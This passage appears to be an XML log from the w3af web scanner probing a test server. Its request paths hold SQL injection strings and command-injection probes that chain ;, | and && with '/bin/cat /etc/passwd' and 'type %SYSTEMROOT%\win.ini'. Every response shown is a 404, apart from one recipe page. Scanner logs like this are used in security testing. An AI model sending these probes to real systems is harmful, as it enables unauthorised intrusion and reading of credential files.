                <httprequest>
                    <status>GET http://10.12.68.43:31337/6bBCX4LD HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 6bBCX4LD has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='6bBCX4LD'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22tuyzr%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22tuyzr%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="742">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/59%27+OR+%2759%27%3D%2759 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 59%27+OR+%2759%27%3D%2759 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='59%27+OR+%2759%27%3D%2759'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="643">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/oLN8EKV8 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about oLN8EKV8 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='oLN8EKV8'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="815">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+SLEEP%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+SLEEP%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="730">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="798">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+SLEEP%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+SLEEP%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="802">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%27b%22c%27d%22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%27b%22c%27d%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="292">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="294">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="295">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="296">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="298">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="301">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="302">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="303">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="304">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="305">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="306">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="307">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="308">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="309">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="310">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="311">
                <httprequest>
